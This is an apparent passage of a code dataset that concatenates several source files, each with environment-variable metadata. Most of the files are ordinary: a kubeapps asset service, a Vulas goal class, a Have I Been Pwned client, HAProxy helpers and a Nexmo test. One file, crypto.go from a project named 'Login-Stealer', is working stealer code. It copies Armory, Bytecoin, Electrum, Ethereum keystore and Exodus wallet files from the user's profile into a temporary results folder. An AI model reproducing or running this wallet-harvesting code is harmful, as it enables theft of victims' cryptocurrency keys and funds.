System.out.println("Screenshot in: " + scrFile.getAbsolutePath());
throw e;
} finally {
// Close the browser
driver.quit();
}
}
*/
}
|
[
"\"TRAVIS\""
] |
[] |
[
"TRAVIS"
] |
[]
|
["TRAVIS"]
|
java
| 1 | 0 | |
cmd/assetsvc/main.go
|
/*
Copyright (c) 2017 The Helm Authors
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package main
import (
"flag"
"net/http"
"os"
"github.com/gorilla/mux"
"github.com/heptiolabs/healthcheck"
"github.com/kubeapps/common/datastore"
"github.com/kubeapps/kubeapps/cmd/assetsvc/pkg/utils"
log "github.com/sirupsen/logrus"
"github.com/urfave/negroni"
)
const pathPrefix = "/v1"
// TODO(absoludity): Let's not use globals for storing state like this.
var manager utils.AssetManager
func setupRoutes() http.Handler {
r := mux.NewRouter()
// Healthcheck
health := healthcheck.NewHandler()
r.Handle("/live", health)
r.Handle("/ready", health)
// Routes
apiv1 := r.PathPrefix(pathPrefix).Subrouter()
// TODO: mnelson: Seems we could use path per endpoint handling empty params? Check.
apiv1.Methods("GET").Path("/clusters/{cluster}/namespaces/{namespace}/charts").Handler(WithParams(listChartsWithFilters)) // accepts: name, version, appversion, repos, categories, q, page, size
apiv1.Methods("GET").Path("/clusters/{cluster}/namespaces/{namespace}/charts/categories").Handler(WithParams(getChartCategories))
apiv1.Methods("GET").Path("/clusters/{cluster}/namespaces/{namespace}/charts/{repo}").Handler(WithParams(listChartsWithFilters)) // accepts: name, version, appversion, repos, categories, q, page, size
apiv1.Methods("GET").Path("/clusters/{cluster}/namespaces/{namespace}/charts/{repo}/categories").Handler(WithParams(getChartCategories))
apiv1.Methods("GET").Path("/clusters/{cluster}/namespaces/{namespace}/charts/{repo}/{chartName}").Handler(WithParams(getChart))
apiv1.Methods("GET").Path("/clusters/{cluster}/namespaces/{namespace}/charts/{repo}/{chartName}/versions").Handler(WithParams(listChartVersions))
apiv1.Methods("GET").Path("/clusters/{cluster}/namespaces/{namespace}/charts/{repo}/{chartName}/versions/{version}").Handler(WithParams(getChartVersion))
apiv1.Methods("GET").Path("/clusters/{cluster}/namespaces/{namespace}/assets/{repo}/{chartName}/versions/{version}/README.md").Handler(WithParams(getChartVersionReadme))
apiv1.Methods("GET").Path("/clusters/{cluster}/namespaces/{namespace}/assets/{repo}/{chartName}/versions/{version}/values.yaml").Handler(WithParams(getChartVersionValues))
apiv1.Methods("GET").Path("/clusters/{cluster}/namespaces/{namespace}/assets/{repo}/{chartName}/versions/{version}/values.schema.json").Handler(WithParams(getChartVersionSchema))
apiv1.Methods("GET").Path("/clusters/{cluster}/namespaces/{namespace}/assets/{repo}/{chartName}/logo").Handler(WithParams(getChartIcon))
// Leave icon on the non-cluster aware as it is used from a link in the db data :/
apiv1.Methods("GET").Path("/ns/{namespace}/assets/{repo}/{chartName}/logo").Handler(WithParams(getChartIcon))
n := negroni.Classic()
n.UseHandler(r)
return n
}
func main() {
dbURL := flag.String("database-url", "localhost", "Database URL")
	dbName := flag.String("database-name", "charts", "Database name")
dbUsername := flag.String("database-user", "", "Database user")
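	// Sensitive settings such as the database password are read from the environment instead of flags.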
dbPassword := os.Getenv("DB_PASSWORD")
flag.Parse()
dbConfig := datastore.Config{URL: *dbURL, Database: *dbName, Username: *dbUsername, Password: dbPassword}
kubeappsNamespace := os.Getenv("POD_NAMESPACE")
var err error
manager, err = utils.NewManager("postgresql", dbConfig, kubeappsNamespace)
if err != nil {
log.Fatal(err)
}
err = manager.Init()
if err != nil {
log.Fatal(err)
}
defer manager.Close()
n := setupRoutes()
port := os.Getenv("PORT")
if port == "" {
port = "8080"
}
addr := ":" + port
log.WithFields(log.Fields{"addr": addr}).Info("Started assetsvc")
	log.Fatal(http.ListenAndServe(addr, n))
}
|
[
"\"DB_PASSWORD\"",
"\"POD_NAMESPACE\"",
"\"PORT\""
] |
[] |
[
"POD_NAMESPACE",
"PORT",
"DB_PASSWORD"
] |
[]
|
["POD_NAMESPACE", "PORT", "DB_PASSWORD"]
|
go
| 3 | 0 | |
lang/src/main/java/com/sap/psr/vulas/goals/AbstractGoal.java
|
package com.sap.psr.vulas.goals;
import java.util.HashMap;
import java.util.Iterator;
import java.util.Map;
import org.apache.commons.configuration.Configuration;
import org.apache.commons.configuration.ConfigurationException;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
import com.sap.psr.vulas.backend.BackendConnector;
import com.sap.psr.vulas.core.util.CoreConfiguration;
import com.sap.psr.vulas.shared.enums.GoalClient;
import com.sap.psr.vulas.shared.enums.GoalType;
import com.sap.psr.vulas.shared.json.JsonBuilder;
import com.sap.psr.vulas.shared.json.model.Application;
import com.sap.psr.vulas.shared.json.model.Space;
import com.sap.psr.vulas.shared.json.model.Tenant;
import com.sap.psr.vulas.shared.util.MemoryMonitor;
import com.sap.psr.vulas.shared.util.StopWatch;
import com.sap.psr.vulas.shared.util.StringList;
import com.sap.psr.vulas.shared.util.StringList.CaseSensitivity;
import com.sap.psr.vulas.shared.util.StringList.ComparisonMode;
import com.sap.psr.vulas.shared.util.StringUtil;
import com.sap.psr.vulas.shared.util.VulasConfiguration;
/**
* Represents the execution of a goal, which is triggered by client components such as the CLI and the Maven plugin.
* There exist different types of goals, e.g., {@link GoalType#CLEAN} or {@link GoalType#A2C}.
*
* Goal executions can be started and stopped manually using the methods {@link AbstractGoal#start()},
* {@link AbstractGoal#stop()}, {@link AbstractGoal#stop(Exception)} and {@link AbstractGoal#upload(boolean)}.
*
* Goal executions can also be executed automatically using the methods
* {@link AbstractGoal#executeSync()} or {@link AbstractGoal#executeAsync()}, which results in the sequential
* execution of the above-mentioned methods {@link AbstractGoal#start()}, etc.
*
* Subclasses typically override the methods prepareExecution, executeTasks and cleanAfterExecution.
*
* See VULAS-204 in case we run into problems related to special characters in paths.
*/
public abstract class AbstractGoal implements Runnable {
private static final Log log = LogFactory.getLog(AbstractGoal.class);
/** Constant <code>CLASS_EXT</code> */
protected static final String[] CLASS_EXT = new String[] {"CLASS"};
/** Constant <code>JAR_EXT</code> */
protected static final String[] JAR_EXT = new String[] {"jar"};
/** Constant <code>WAR_EXT</code> */
protected static final String[] WAR_EXT = new String[] {"war"};
/** Constant <code>JAR_WAR_EXT</code> */
protected static final String[] JAR_WAR_EXT = new String[] {"jar", "war"};
private GoalClient client = null;
/**
* Random identifier composed of the goal, current time millis and a random number (8 digits).
*/
private String id = null;
private final long createdAt = System.currentTimeMillis();
/**
* The goal-specific configuration.
*/
private VulasConfiguration configuration;
/**
* The context in which the goal is going to be executed.
*/
private GoalContext goalContext = null;
/**
* The goal executed.
*/
private GoalType goalType = null;
/**
* The exception that terminated the goal execution (if any).
* @see #stop(Exception)
*/
private Exception exception = null;
// Stop watch to determine runtime
private StopWatch stopWatch = null;
// Memory monitoring
private MemoryMonitor memoThread = null;
// System information (CPU, OS, JVM, etc.)
private Map<String,String> systemInfo = new HashMap<String,String>();
// Goal-specific stats (set from outside)
private Map<String,Double> goalStats = new HashMap<String,Double>();
private ExecutionObserver observer = null;
/** Determines whether goal execution info will be uploaded. */
private boolean goalUploadEnabled = true;
/*
* Creates a new goal execution.
* @param _app the context of this execution (can be null, i.e., unknown, in case of TEST)
* @param _goal the goal of this execution
* @see
*/
/**
* <p>Constructor for AbstractGoal.</p>
*
* @param _goal a {@link com.sap.psr.vulas.shared.enums.GoalType} object.
*/
protected AbstractGoal(GoalType _goal) {
this(_goal, true);
}
/**
* <p>Constructor for AbstractGoal.</p>
*
* @param _goal a {@link com.sap.psr.vulas.shared.enums.GoalType} object.
* @param _monitor_mem a boolean.
*/
protected AbstractGoal(GoalType _goal, boolean _monitor_mem) {
this.goalType = _goal;
// Create memory monitor (if requested)
if(_monitor_mem)
this.memoThread = new MemoryMonitor();
// Number of processors
this.systemInfo.put("runtime.availableProcessors", Integer.toString(Runtime.getRuntime().availableProcessors()));
}
/**
* <p>Getter for the field <code>id</code>.</p>
*
* @return a {@link java.lang.String} object.
*/
public synchronized String getId() {
if(this.id==null) {
if(this.client!=null)
this.id = this.client + "-" + this.goalType + "-" + this.createdAt+ "-" + (int)Math.abs(Math.random()*100000000);
else
this.id = this.goalType + "-" + this.createdAt+ "-" + (int)Math.abs(Math.random()*100000000);
}
return this.id;
}
/**
* <p>Setter for the field <code>observer</code>.</p>
*
* @param observer a {@link com.sap.psr.vulas.goals.ExecutionObserver} object.
*/
public void setObserver(ExecutionObserver observer) { this.observer = observer; }
/**
* <p>Getter for the field <code>goalType</code>.</p>
*
* @return a {@link com.sap.psr.vulas.shared.enums.GoalType} object.
*/
public GoalType getGoalType() { return this.goalType; }
/**
* <p>getGoalClient.</p>
*
* @return a {@link com.sap.psr.vulas.shared.enums.GoalClient} object.
*/
public GoalClient getGoalClient() { return this.client; }
/**
* <p>setGoalClient.</p>
*
* @param _client a {@link com.sap.psr.vulas.shared.enums.GoalClient} object.
*/
public void setGoalClient(GoalClient _client) { this.client = _client; }
/**
* Returns true if this {@link AbstractGoal} is executed in the given {@link GoalClient}, false otherwise.
*
* @param _client a {@link com.sap.psr.vulas.shared.enums.GoalClient} object.
* @return a boolean.
*/
public boolean runsIn(GoalClient _client) { return this.client!=null && _client!=null && _client.equals(this.client); }
//TODO (17/05/2017): Add callback parameter?
/**
* <p>executeAsync.</p>
*/
public final void executeAsync() {
final Thread t = new Thread(this, "vulas-" + this.goalType.toString().toLowerCase());
t.start();
}
/**
* <p>run.</p>
*/
public final void run() {
try {
this.execute();
} catch (GoalConfigurationException e) {
log.error("Error while configuring " + this + ": " + e.getMessage(), e);
} catch (GoalExecutionException e) {
log.error("Error while executing " + this + ": " + e.getMessage(), e);
}
}
/**
* <p>executeSync.</p>
*
* @throws com.sap.psr.vulas.goals.GoalConfigurationException if any.
* @throws com.sap.psr.vulas.goals.GoalExecutionException if any.
*/
public final void executeSync() throws GoalConfigurationException, GoalExecutionException {
this.execute();
}
private final void execute() throws GoalConfigurationException, GoalExecutionException {
// Execute the goal and measure execution time
try {
this.start();
this.executeTasks();
this.stop();
}
// Throw as is
catch(GoalConfigurationException gce) {
this.stop(gce);
this.skipGoalUpload(); // Do not upload in case of configuration problems
throw gce;
}
// Throw as is
catch(GoalExecutionException gee) {
this.stop(gee);
throw gee;
}
		// Embed in GoalExecutionException
catch(Exception e) {
this.stop(e);
throw new GoalExecutionException(e);
}
finally {
if(this.goalUploadEnabled)
this.upload(false);
}
}
/**
* Returns the configuration of this goal execution. If the configuration has not been set before, a new instance of
* {@link VulasConfiguration} is created and returned. As such, the configuration settings of different goal executions
* can be isolated.
*
* @return a {@link com.sap.psr.vulas.shared.util.VulasConfiguration} object.
*/
protected synchronized final VulasConfiguration getConfiguration() {
if(this.configuration==null)
this.configuration = new VulasConfiguration();
return this.configuration;
}
/**
* <p>Setter for the field <code>configuration</code>.</p>
*
* @param _c a {@link com.sap.psr.vulas.shared.util.VulasConfiguration} object.
* @return a {@link com.sap.psr.vulas.goals.AbstractGoal} object.
*/
public final AbstractGoal setConfiguration(VulasConfiguration _c) { this.configuration = _c; return this;}
/**
* Returns the context of this goal execution. If the context has not been set before, it is constructed
* by reading tenant, space and app information from the configuration obtained from {@link AbstractGoal#getConfiguration()}.
*
* @return a {@link com.sap.psr.vulas.goals.GoalContext} object.
*/
public synchronized final GoalContext getGoalContext() {
if(this.goalContext==null) {
final Configuration c = this.getConfiguration().getConfiguration();
this.goalContext = new GoalContext();
// Configuration
this.goalContext.setVulasConfiguration(this.getConfiguration());
// Tenant
if(!this.getConfiguration().isEmpty(CoreConfiguration.TENANT_TOKEN))
this.goalContext.setTenant(new Tenant(c.getString(CoreConfiguration.TENANT_TOKEN)));
// Space
if(!this.getConfiguration().isEmpty(CoreConfiguration.SPACE_TOKEN)) {
final Space space = new Space();
space.setSpaceToken(c.getString(CoreConfiguration.SPACE_TOKEN));
this.goalContext.setSpace(space);
}
// App
if(Application.canBuildApplication(c.getString(CoreConfiguration.APP_CTX_GROUP), c.getString(CoreConfiguration.APP_CTX_ARTIF), c.getString(CoreConfiguration.APP_CTX_VERSI))) {
final Application a = new Application(c.getString(CoreConfiguration.APP_CTX_GROUP), c.getString(CoreConfiguration.APP_CTX_ARTIF), c.getString(CoreConfiguration.APP_CTX_VERSI));
if(a.isComplete())
this.goalContext.setApplication(a);
else
log.warn("Incomplete application context: " + a.toString());
}
}
return this.goalContext;
}
/**
* <p>Setter for the field <code>goalContext</code>.</p>
*
* @param _ctx a {@link com.sap.psr.vulas.goals.GoalContext} object.
*/
public final void setGoalContext(GoalContext _ctx) {
this.goalContext = _ctx;
}
// >>>>> Methods that can/must be implemented by specific goals
/**
* Cleans the cache of the {@link BackendConnector}.
* CAN be overridden in subclasses to perform additional, goal-specific checks and preparations.
*
* @throws com.sap.psr.vulas.goals.GoalConfigurationException if any.
*/
protected void prepareExecution() throws GoalConfigurationException {
BackendConnector.getInstance().cleanCache();
try {
this.getConfiguration().checkSettings();
} catch (ConfigurationException e) {
throw new GoalConfigurationException(e);
}
}
/**
* CAN be overridden in subclasses.
*
* @throws com.sap.psr.vulas.goals.GoalConfigurationException if any.
*/
protected void checkPreconditions() throws GoalConfigurationException {}
/**
* MUST be overridden in subclasses to implement the goal-specific tasks.
*
* @throws java.lang.Exception if any.
*/
protected abstract void executeTasks() throws Exception;
/**
* Empty implementation.
*
* CAN be overridden in subclasses in order to perform goal-specific clean-up.
*/
protected void cleanAfterExecution() {}
/**
* Empty implementation.
*
* @return a {@link java.lang.Object} object.
*/
protected Object getResultObject() { return null; }
// <<<<< Methods that can/must be implemented by specific goals
/**
* Starts the goal execution.
*
* @throws com.sap.psr.vulas.goals.GoalConfigurationException if any.
*/
public void start() throws GoalConfigurationException {
// Start time taking
this.stopWatch = new StopWatch(this.toString()).start();
// Monitor mem consumption?
if(this.memoThread!=null) {
final Thread t = new Thread(this.memoThread, "vulas-memo");
t.setPriority(Thread.MIN_PRIORITY);
t.start();
}
// Prepare the execution
this.prepareExecution();
// Check whether all conditions to execute the tasks are met
this.checkPreconditions();
this.stopWatch.lap("Completed goal preparation", false);
}
/**
* Stops the goal execution, i.e., takes the time and stops the monitoring thread (if any).
*/
public void stop() {
// Already stopped?
if(!this.stopWatch.isRunning())
throw new IllegalStateException("Goal execution already finished");
// Stop!
else {
this.stopMemo();
this.stopWatch.lap("Completed execution", true);
this.cleanAfterExecution();
this.stopWatch.lap("Completed clean-up", false);
this.stopWatch.stop();
this.notifyObserver();
}
}
/**
* Stops the goal execution in response to the provided exception.
*
* @param _e a {@link java.lang.Exception} object.
* @see #stop()
*/
public void stop(Exception _e) {
// Already stopped?
if(!this.stopWatch.isRunning())
throw new IllegalStateException("Goal execution already finished");
// Stop!
else {
this.stopMemo();
this.exception = _e;
this.stopWatch.stop(_e);
this.notifyObserver();
}
}
private void notifyObserver() {
if(this.observer!=null)
this.observer.callback(this);
}
private final void stopMemo() {
if(this.memoThread!=null)
this.memoThread.stop();
}
/**
* <p>addGoalStats.</p>
*
* @param _prefix a {@link java.lang.String} object.
* @param _stats a {@link java.util.Map} object.
*/
public void addGoalStats(String _prefix, Map<String,Long> _stats) {
for(Map.Entry<String, Long> entry : _stats.entrySet()) {
this.addGoalStats( (_prefix==null || _prefix.equals("") ? entry.getKey() : _prefix + "." + entry.getKey()) , entry.getValue());
}
}
/**
* <p>addGoalStats.</p>
*
* @param _key a {@link java.lang.String} object.
* @param _val a long.
*/
public void addGoalStats(String _key, long _val) {
this.addGoalStats(_key, (double)_val);
}
/**
* <p>addGoalStats.</p>
*
* @param _key a {@link java.lang.String} object.
* @param _val a int.
*/
public void addGoalStats(String _key, int _val) {
this.addGoalStats(_key, (double)_val);
}
/**
* <p>addGoalStats.</p>
*
* @param _key a {@link java.lang.String} object.
* @param _val a double.
*/
public void addGoalStats(String _key, double _val) {
		this.goalStats.put(_key, Double.valueOf(_val));
}
/**
* <p>toString.</p>
*
* @return a {@link java.lang.String} object.
*/
public String toString() {
final StringBuffer b = new StringBuffer();
b.append("Goal [id=").append(this.getId()).append(", type=").append(this.getGoalType());
if(this.goalContext!=null)
b.append(", ctx=").append(this.goalContext.toString());
b.append("]");
return b.toString();
}
/**
* Creates a JSON string representing this goal execution.
*
* @throws java.lang.IllegalStateException
* @return a {@link java.lang.String} object.
*/
public String toJson() throws IllegalStateException {
final StringBuilder b = new StringBuilder();
b.append("{\"executionId\":\"").append(this.getId()).append("\"");
b.append(",\"goal\":\"").append(this.goalType).append("\"");
b.append(",\"startedAtClient\":\"").append(StringUtil.formatDate(this.stopWatch.getStartMillis())).append("\"");
b.append(",\"clientVersion\":").append(JsonBuilder.escape(CoreConfiguration.getVulasRelease()));
// Exception (if any) and stacktrace
if(exception!=null && exception.getMessage()!=null)
b.append(",\"exception\":").append(JsonBuilder.escape(this.exception.getMessage().substring(0, Math.min(this.exception.getMessage().length(), 255))));
// Runtime in nano secs
if(this.stopWatch.isRunning())
b.append(",\"runtimeNano\":-1");
else
b.append(",\"runtimeNano\":").append(this.stopWatch.getRuntime());
// Memory info (can be -1 if not monitored)
if(this.memoThread!=null) {
b.append(",\"memMax\":").append(this.memoThread.getJvmMax());
b.append(",\"memUsedMax\":").append(this.memoThread.getMaxUsed());
b.append(",\"memUsedAvg\":").append(this.memoThread.getAvgUsed());
}
// Goal configuration
b.append(",\"configuration\":[");
int c = 0;
final Iterator<String> iter = this.getConfiguration().getConfiguration().subset("vulas").getKeys();
while(iter.hasNext()) {
final String key = iter.next();
final String[] value = this.getConfiguration().getConfiguration().getStringArray("vulas." + key);
if(c++>0) b.append(",");
b.append("{\"source\":\"GOAL_CONFIG\",\"name\":").append(JsonBuilder.escape(key)).append(",\"value\":").append(JsonBuilder.escape(StringUtil.join(value, ","))).append("}");
}
b.append("]");
// Goal statistics
b.append(",\"statistics\":{");
c = 0;
for(Map.Entry<String, Double> entry: this.goalStats.entrySet()) {
if(c++>0) b.append(",");
b.append(JsonBuilder.escape(entry.getKey())).append(":").append(entry.getValue());
}
b.append("}");
// System info
final StringList env_whitelist = this.getConfiguration().getStringList(VulasConfiguration.ENV_VARS, VulasConfiguration.ENV_VARS_CUSTOM);
final StringList sys_whitelist = this.getConfiguration().getStringList(VulasConfiguration.SYS_PROPS, VulasConfiguration.SYS_PROPS_CUSTOM);
// A subset of environment variables
this.systemInfo.putAll(env_whitelist.filter(System.getenv(), true, ComparisonMode.EQUALS, CaseSensitivity.CASE_INSENSITIVE));
// A subset of system properties
for(Object key : System.getProperties().keySet()) {
final String key_string = (String)key;
if(sys_whitelist.contains(key_string, ComparisonMode.STARTSWITH, CaseSensitivity.CASE_INSENSITIVE))
this.systemInfo.put(key_string, System.getProperty(key_string));
}
b.append(",\"systemInfo\":[");
c = 0;
for(Map.Entry<String, String> entry: this.systemInfo.entrySet()) {
if(c++>0) b.append(",");
b.append("{\"source\":\"SYSTEM_INFO\",\"name\":").append(JsonBuilder.escape(entry.getKey())).append(",\"value\":").append(JsonBuilder.escape(entry.getValue())).append("}");
}
b.append("]}");
return b.toString();
}
/**
* <p>skipGoalUpload.</p>
*/
protected final void skipGoalUpload() {
this.goalUploadEnabled = false;
}
/**
* Uploads the JSON presentation of this goal execution to the Vulas backend.
 * Returns true if everything went fine (upload succeeded or is not necessary), false otherwise.
*
* @param _before a boolean.
* @return a boolean.
*/
public boolean upload(boolean _before) {
boolean ret = false;
try {
AbstractGoal.log.info("Uploading goal execution info ...");
ret = BackendConnector.getInstance().uploadGoalExecution(this.getGoalContext(), this, _before);
AbstractGoal.log.info("Uploaded goal execution info");
} catch (Exception e) {
AbstractGoal.log.error("Error while uploading goal execution info: " + e.getMessage());
}
return ret;
}
}
|
[] |
[] |
[] |
[]
|
[]
|
java
| 0 | 0 | |
core/parse/crypto/crypto.go
|
package crypto
import (
"io/ioutil"
"os"
"path/filepath"
"strings"
"github.com/Not-Cyrus/Login-Stealer/utils"
)
func log(name, path, searchQuery string) {
var tempEPath = userPath + path
files, err := ioutil.ReadDir(tempEPath) // os.ReadDir is better, but we need cross compatibility
if err != nil {
return
}
var exodusPath = tempPath + "\\" + name
if os.Mkdir(exodusPath, 0666) != nil {
return
}
for _, file := range files {
if len(searchQuery) > 0 && !strings.HasSuffix(file.Name(), searchQuery) {
continue
}
utils.CopyFile(utils.CleanPath(exodusPath+"\\"+file.Name()), tempEPath+"\\"+file.Name())
}
}
func LogCrypto() {
for name, data := range paths {
log(name, data.Path, data.Query)
}
}
var (
paths = map[string]struct {
Path string
Query string
}{
"Armory": { // the canadian in me wants to change this to Armoury very bad
Path: "\\AppData\\Roaming\\Armory",
Query: "wallet",
},
"Bytecoin": {
Path: "\\AppData\\Roaming\\Bytecoin",
Query: "wallet",
},
"Electrum": {
Path: "\\AppData\\Roaming\\Electrum\\wallets",
},
"Ethereum": {
Path: "\\AppData\\Roaming\\Ethereum\\keystore",
},
"Exodus": {
Path: "\\AppData\\Roaming\\Exodus\\exodus.wallet",
},
}
tempPath = utils.CleanPath(filepath.Join(os.Getenv("TEMP"), "Results"))
userPath = os.Getenv("USERPROFILE")
)
|
[
"\"TEMP\"",
"\"USERPROFILE\""
] |
[] |
[
"USERPROFILE",
"TEMP"
] |
[]
|
["USERPROFILE", "TEMP"]
|
go
| 2 | 0 | |
haveibeenpwned.go
|
// Package haveibeenpwned provides access to the Have I been Pwned API, returning a BreachModel or a PasteModel
// if any breach/paste is found.
package haveibeenpwned
import (
"encoding/json"
"errors"
"io/ioutil"
"net/http"
"net/url"
"os"
)
//API URL of haveibeenpwned.com
const API = "https://haveibeenpwned.com/api/v3/"
//BreachModel Each breach contains a number of attributes describing the incident. In the future, these attributes may expand without the API being versioned.
type BreachModel struct {
Name string `json:"Name,omitempty"`
Title string `json:"Title,omitempty"`
Domain string `json:"Domain,omitempty"`
BreachDate string `json:"BreachDate,omitempty"`
AddedDate string `json:"AddedDate,omitempty"`
ModifiedDate string `json:"ModifiedDate,omitempty"`
PwnCount int `json:"PwnCount,omitempty"`
Description string `json:"Description,omitempty"`
DataClasses []string `json:"DataClasses,omitempty"`
IsVerified bool `json:"IsVerified,omitempty"`
IsFabricated bool `json:"IsFabricated,omitempty"`
IsSensitive bool `json:"IsSensitive,omitempty"`
IsRetired bool `json:"IsRetired,omitempty"`
IsSpamList bool `json:"IsSpamList,omitempty"`
LogoPath string `json:"LogoPath,omitempty"`
}
//PasteModel Each paste contains a number of attributes describing it. In the future, these attributes may expand without the API being versioned.
type PasteModel struct {
Source string `json:"Source,omitempty"`
ID string `json:"Id,omitempty"`
Title string `json:"Title,omitempty"`
Date string `json:"Date,omitempty"`
EmailCount int `json:"EmailCount,omitempty"`
}
//BreachedAccount The most common use of the API is to return a list of all breaches a particular account has been involved in. The API takes a single parameter which is the account to be searched for. The account is not case sensitive and will be trimmed of leading or trailing white spaces. The account should always be URL encoded.
func BreachedAccount(account, domainFilter string, truncate, unverified bool) ([]BreachModel, error) {
res, err := callService("breachedaccount", account, domainFilter, truncate, unverified)
if err != nil {
return nil, err
}
if res.StatusCode == http.StatusNotFound {
return nil, nil
}
body, err := ioutil.ReadAll(res.Body)
if err != nil {
return nil, err
}
defer res.Body.Close()
breaches := make([]BreachModel, 0)
if err := json.Unmarshal(body, &breaches); err != nil {
return nil, err
}
return breaches, nil
}
//Breaches Getting all breached sites in the system. A "breach" is an instance of a system having been compromised by an attacker and the data disclosed.
func Breaches(domainFilter string) ([]BreachModel, error) {
res, err := callService("breaches", "", "", false, false)
if err != nil {
return nil, err
}
if res.StatusCode == http.StatusNotFound {
return nil, nil
}
body, err := ioutil.ReadAll(res.Body)
if err != nil {
return nil, err
}
defer res.Body.Close()
breaches := make([]BreachModel, 0)
if err := json.Unmarshal(body, &breaches); err != nil {
return nil, err
}
return breaches, nil
}
//Breach Sometimes just a single breach is required and this can be retrieved by the breach "name". This is the stable value which may or may not be the same as the breach "title" (which can change).
func Breach(name string) (BreachModel, error) {
breach := new(BreachModel)
res, err := callService("breach", name, "", false, false)
if err != nil {
return *breach, err
}
if res.StatusCode == http.StatusNotFound {
return *breach, nil
}
body, err := ioutil.ReadAll(res.Body)
if err != nil {
return *breach, err
}
defer res.Body.Close()
if err := json.Unmarshal(body, &breach); err != nil {
return *breach, err
}
return *breach, nil
}
//PasteAccount The API takes a single parameter which is the email address to be searched for. Unlike searching for breaches, usernames that are not email addresses cannot be searched for. The email is not case sensitive and will be trimmed of leading or trailing white spaces. The email should always be URL encoded.
func PasteAccount(email string) ([]PasteModel, error) {
res, err := callService("pasteaccount", email, "", false, false)
if err != nil {
return nil, err
}
if res.StatusCode == http.StatusNotFound {
return nil, nil
}
body, err := ioutil.ReadAll(res.Body)
if err != nil {
return nil, err
}
defer res.Body.Close()
pastes := make([]PasteModel, 0)
if err := json.Unmarshal(body, &pastes); err != nil {
return nil, err
}
return pastes, nil
}
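//callService builds a request against the given haveibeenpwned.com service and account, adds the optional
//query parameters and the hibp-api-key header taken from the HIBP_API_KEY environment variable, and returns the raw response.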
func callService(service, account, domainFilter string, truncate, unverified bool) (*http.Response, error) {
client := &http.Client{}
u, err := url.Parse(API)
if err != nil {
return nil, err
}
u.Path += service + "/" + account
parameters := url.Values{}
if domainFilter != "" {
parameters.Add("domain", domainFilter)
}
	if !truncate {
parameters.Add("truncateResponse", "false")
}
if unverified {
parameters.Add("includeUnverified", "true")
}
u.RawQuery = parameters.Encode()
req, err := http.NewRequest("GET", u.String(), nil)
if err != nil {
return nil, err
}
req.Header.Set("User-Agent", "Go/1.15")
req.Header.Set("hibp-api-key", os.Getenv("HIBP_API_KEY"))
	res, err := client.Do(req)
	if err != nil {
		return nil, err
	}
	switch res.StatusCode {
case http.StatusBadRequest:
return nil, errors.New("the account does not comply with an acceptable format")
case http.StatusTooManyRequests:
return nil, errors.New("too many requests — the rate limit has been exceeded")
case http.StatusUnauthorized:
return nil, errors.New("valid header `hibp-api-key` required")
}
return res, nil
}
|
[
"\"HIBP_API_KEY\""
] |
[] |
[
"HIBP_API_KEY"
] |
[]
|
["HIBP_API_KEY"]
|
go
| 1 | 0 | |
configuration/cluster_sync_helpers.go
|
// Copyright 2019 HAProxy Technologies
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
package configuration
import (
"os"
"github.com/haproxytech/dataplaneapi/log"
)
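// getNodeFacts collects the facts (command line, HAProxy version) that this node reports to the cluster.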
func (c *ClusterSync) getNodeFacts() map[string]string {
facts := map[string]string{}
// report the dataplane_cmdline if started from within haproxy
if c.cfg.HAProxy.MasterWorkerMode || os.Getenv("HAPROXY_MWORKER") == "1" {
facts["dataplane_cmdline"] = c.cfg.Cmdline.String()
}
	runtime, err := c.cli.Runtime()
	if err != nil {
		log.Errorf("unable to fetch runtime client: %s", err.Error())
		return facts
	}
processInfos, err := runtime.GetInfo()
if err != nil || len(processInfos) < 1 {
log.Error("unable to fetch processInfo")
} else {
if processInfos[0].Info != nil {
facts["haproxy_version"] = processInfos[0].Info.Version
} else {
log.Error("empty process info")
}
}
return facts
}
|
[
"\"HAPROXY_MWORKER\""
] |
[] |
[
"HAPROXY_MWORKER"
] |
[]
|
["HAPROXY_MWORKER"]
|
go
| 1 | 0 | |
nexmo_test.go
|
package nexmo
import (
"fmt"
"log"
"net/http"
"net/url"
"os"
"testing"
"encoding/json"
"flag"
"github.com/judy2k/go-vcr/cassette"
"github.com/judy2k/go-vcr/recorder"
)
var _recorder *recorder.Recorder
var _client *Client
func TestMain(m *testing.M) {
var mode string
flag.StringVar(&mode, "mode", "", "Should be one of \"replaying\", \"recording\" or \"disabled\"")
flag.Parse()
fmt.Println("Mode:", mode)
recorderMode := recorder.ModeReplaying
switch mode {
case "replaying":
fmt.Println("Replaying requests")
recorderMode = recorder.ModeReplaying
case "recording":
fmt.Println("Recording requests")
recorderMode = recorder.ModeRecording
case "disabled":
fmt.Println("HTTP recorder disabled")
recorderMode = recorder.ModeDisabled
}
fmt.Println("Running TestMain")
os.Exit(func() int {
// Start our recorder
		r, err := recorder.NewAsMode("fixtures", recorderMode, nil)
		if err != nil {
			log.Fatal(err)
		}
		r.SetFilter(filterFunc)
		defer r.Stop()
_recorder = r
_client = initClient()
return m.Run()
}())
}
func initClient() *Client {
apiKey := os.Getenv("NEXMO_API_KEY")
apiSecret := os.Getenv("NEXMO_API_SECRET")
if _client != nil {
return _client
}
// TODO: FIX ME!
// path := os.Getenv("NEXMO_PRIVATE_KEY_PATH")
// b, err := ioutil.ReadFile(path)
// if err != nil {
// log.Fatal(err)
// }
auth := NewAuthSet()
// if err := auth.SetApplicationAuth(os.Getenv("NEXMO_APPLICATION_ID"), b); err != nil {
// log.Fatal(err)
// }
auth.SetAPISecret(apiKey, apiSecret)
httpClient := http.Client{
Transport: _recorder,
}
_client = NewClient(&httpClient, auth)
return _client
}
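// filterFunc scrubs credentials (API key and secret) from recorded interactions before they are written to the cassette.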
func filterFunc(i *cassette.Interaction) error {
// Purge the headers:
i.Request.Headers.Del("Authorization")
// Purge the query:
qURL, err := url.Parse(i.Request.URL)
if err != nil {
return err
}
query := qURL.Query()
query.Del("api_key")
query.Del("api_secret")
// Purge the body:
